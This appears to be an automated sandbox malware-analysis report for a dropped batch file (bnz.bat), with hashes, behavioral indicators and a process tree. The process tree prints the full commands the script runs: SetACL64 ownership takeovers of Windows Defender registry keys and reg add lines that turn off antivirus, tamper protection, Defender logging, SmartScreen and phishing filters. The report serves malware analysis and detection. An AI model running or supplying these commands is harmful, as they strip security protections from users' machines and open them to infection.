Overview
overview
10Static
static
71310121612...52.exe
windows7-x64
101310121612...52.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_63_/PowerRun64.exe
windows7-x64
4$_63_/PowerRun64.exe
windows10-2004-x64
3$_63_/SetACL64.exe
windows7-x64
1$_63_/SetACL64.exe
windows10-2004-x64
1$_63_/acxx...gr.exe
windows7-x64
3$_63_/acxx...gr.exe
windows10-2004-x64
3$_63_/bn.bat
windows7-x64
1$_63_/bn.bat
windows10-2004-x64
1$_63_/bn1.bat
windows7-x64
10$_63_/bn1.bat
windows10-2004-x64
10$_63_/bnn.bat
windows7-x64
1$_63_/bnn.bat
windows10-2004-x64
1$_63_/bnoo1.bat
windows7-x64
10$_63_/bnoo1.bat
windows10-2004-x64
10$_63_/bnz.bat
windows7-x64
1$_63_/bnz.bat
windows10-2004-x64
1$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/dotN...up.exe
windows7-x64
7$_63_/dotN...up.exe
windows10-2004-x64
7$_63_/win_...rp.exe
windows7-x64
3$_63_/win_...rp.exe
windows10-2004-x64
3Analysis
-
max time kernel
118s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04-12-2024 13:57
Behavioral task
behavioral1
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral2
Sample
13101216127da473cec5dda480c23c4db57e1f1a9d25f46c7595818c30cf1f52.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral7
Sample
$_63_/PowerRun64.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral8
Sample
$_63_/PowerRun64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral9
Sample
$_63_/SetACL64.exe
Resource
win7-20241010-en
windows7-x64
Behavioral task
behavioral10
Sample
$_63_/SetACL64.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral11
Sample
$_63_/acxxtzcogvgr.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral12
Sample
$_63_/acxxtzcogvgr.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral13
Sample
$_63_/bn.bat
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral14
Sample
$_63_/bn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral15
Sample
$_63_/bn1.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral16
Sample
$_63_/bn1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral17
Sample
$_63_/bnn.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral18
Sample
$_63_/bnn.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral19
Sample
$_63_/bnoo1.bat
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral20
Sample
$_63_/bnoo1.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral21
Sample
$_63_/bnz.bat
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral22
Sample
$_63_/bnz.bat
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral23
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win7-20240903-en
windows7-x64
Behavioral task
behavioral24
Sample
$_63_/dotNetFx40_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral25
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win7-20241023-en
windows7-x64
Behavioral task
behavioral26
Sample
$_63_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
Behavioral task
behavioral27
Sample
$_63_/win_version_csharp.exe
Resource
win7-20240729-en
windows7-x64
Behavioral task
behavioral28
Sample
$_63_/win_version_csharp.exe
Resource
win10v2004-20241007-en
windows10-2004-x64
General
-
Target
$_63_/bnz.bat
-
Size
2KB
-
MD5
a639b0bfefec4e4032cffe1a11e7c28a
-
SHA1
0247f009b3310e486a04ddc68c9123e184285407
-
SHA256
1cb11eaa7973052f97f53e33e65be14e9c17aaa95e8f43d20cc42f89db96f78b
-
SHA512
46b0a53cacfd9204884f50221fe2dd7e5607cf2abc16cfa4bc6edb076dc55228a07885bb511f475668a459895fd89407b1fd2a963fdfd764bd50b4bb92c04306
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
description pid Process Token: SeBackupPrivilege 2536 SetACL64.exe Token: SeRestorePrivilege 2536 SetACL64.exe Token: SeTakeOwnershipPrivilege 2536 SetACL64.exe Token: SeBackupPrivilege 2380 SetACL64.exe Token: SeRestorePrivilege 2380 SetACL64.exe Token: SeTakeOwnershipPrivilege 2380 SetACL64.exe Token: SeBackupPrivilege 1180 SetACL64.exe Token: SeRestorePrivilege 1180 SetACL64.exe Token: SeTakeOwnershipPrivilege 1180 SetACL64.exe Token: SeBackupPrivilege 1980 SetACL64.exe Token: SeRestorePrivilege 1980 SetACL64.exe Token: SeTakeOwnershipPrivilege 1980 SetACL64.exe Token: SeBackupPrivilege 2052 SetACL64.exe Token: SeRestorePrivilege 2052 SetACL64.exe Token: SeTakeOwnershipPrivilege 2052 SetACL64.exe Token: SeBackupPrivilege 2184 SetACL64.exe Token: SeRestorePrivilege 2184 SetACL64.exe Token: SeTakeOwnershipPrivilege 2184 SetACL64.exe Token: SeBackupPrivilege 1888 SetACL64.exe Token: SeRestorePrivilege 1888 SetACL64.exe Token: SeTakeOwnershipPrivilege 1888 SetACL64.exe -
Suspicious use of WriteProcessMemory 60 IoCs
description pid Process procid_target PID 2524 wrote to memory of 2536 2524 cmd.exe 31 PID 2524 wrote to memory of 2536 2524 cmd.exe 31 PID 2524 wrote to memory of 2536 2524 cmd.exe 31 PID 2524 wrote to memory of 2380 2524 cmd.exe 32 PID 2524 wrote to memory of 2380 2524 cmd.exe 32 PID 2524 wrote to memory of 2380 2524 cmd.exe 32 PID 2524 wrote to memory of 1180 2524 cmd.exe 33 PID 2524 wrote to memory of 1180 2524 cmd.exe 33 PID 2524 wrote to memory of 1180 2524 cmd.exe 33 PID 2524 wrote to memory of 1980 2524 cmd.exe 34 PID 2524 wrote to memory of 1980 2524 cmd.exe 34 PID 2524 wrote to memory of 1980 2524 cmd.exe 34 PID 2524 wrote to memory of 2052 2524 cmd.exe 35 PID 2524 wrote to memory of 2052 2524 cmd.exe 35 PID 2524 wrote to memory of 2052 2524 cmd.exe 35 PID 2524 wrote to memory of 2184 2524 cmd.exe 36 PID 2524 wrote to memory of 2184 2524 cmd.exe 36 PID 2524 wrote to memory of 2184 2524 cmd.exe 36 PID 2524 wrote to memory of 1888 2524 cmd.exe 37 PID 2524 wrote to memory of 1888 2524 cmd.exe 37 PID 2524 wrote to memory of 1888 2524 cmd.exe 37 PID 2524 wrote to memory of 2764 2524 cmd.exe 38 PID 2524 wrote to memory of 2764 2524 cmd.exe 38 PID 2524 wrote to memory of 2764 2524 cmd.exe 38 PID 2524 wrote to memory of 2724 2524 cmd.exe 39 PID 2524 wrote to memory of 2724 2524 cmd.exe 39 PID 2524 wrote to memory of 2724 2524 cmd.exe 39 PID 2524 wrote to memory of 2728 2524 cmd.exe 40 PID 2524 wrote to memory of 2728 2524 cmd.exe 40 PID 2524 wrote to memory of 2728 2524 cmd.exe 40 PID 2524 wrote to memory of 2816 2524 cmd.exe 41 PID 2524 wrote to memory of 2816 2524 cmd.exe 41 PID 2524 wrote to memory of 2816 2524 cmd.exe 41 PID 2524 wrote to memory of 2832 2524 cmd.exe 42 PID 2524 wrote to memory of 2832 2524 cmd.exe 42 PID 2524 wrote to memory of 2832 2524 cmd.exe 42 PID 2524 wrote to memory of 2836 2524 cmd.exe 43 PID 2524 wrote to memory of 2836 2524 cmd.exe 43 PID 2524 wrote to memory of 2836 2524 cmd.exe 43 PID 2524 wrote to memory of 2848 2524 cmd.exe 44 PID 2524 wrote to memory of 2848 2524 cmd.exe 44 PID 2524 wrote to memory of 2848 2524 cmd.exe 44 PID 2524 wrote to memory of 2904 2524 cmd.exe 45 PID 2524 wrote to memory of 2904 2524 cmd.exe 45 PID 2524 wrote to memory of 2904 2524 cmd.exe 45 PID 2524 wrote to memory of 2820 2524 cmd.exe 46 PID 2524 wrote to memory of 2820 2524 cmd.exe 46 PID 2524 wrote to memory of 2820 2524 cmd.exe 46 PID 2524 wrote to memory of 2776 2524 cmd.exe 47 PID 2524 wrote to memory of 2776 2524 cmd.exe 47 PID 2524 wrote to memory of 2776 2524 cmd.exe 47 PID 2524 wrote to memory of 2744 2524 cmd.exe 48 PID 2524 wrote to memory of 2744 2524 cmd.exe 48 PID 2524 wrote to memory of 2744 2524 cmd.exe 48 PID 2524 wrote to memory of 2752 2524 cmd.exe 49 PID 2524 wrote to memory of 2752 2524 cmd.exe 49 PID 2524 wrote to memory of 2752 2524 cmd.exe 49 PID 2524 wrote to memory of 2252 2524 cmd.exe 50 PID 2524 wrote to memory of 2252 2524 cmd.exe 50 PID 2524 wrote to memory of 2252 2524 cmd.exe 50
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\$_63_\bnz.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2524 -
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2536
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2380
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1180
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2184
-
-
C:\Users\Admin\AppData\Local\Temp\$_63_\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f2⤵PID:2764
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f2⤵PID:2724
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f2⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f2⤵PID:2816
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f2⤵PID:2832
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f2⤵PID:2836
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f2⤵PID:2848
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f2⤵PID:2904
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f2⤵PID:2820
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f2⤵PID:2776
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f2⤵PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f2⤵PID:2752
-
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f2⤵PID:2252
-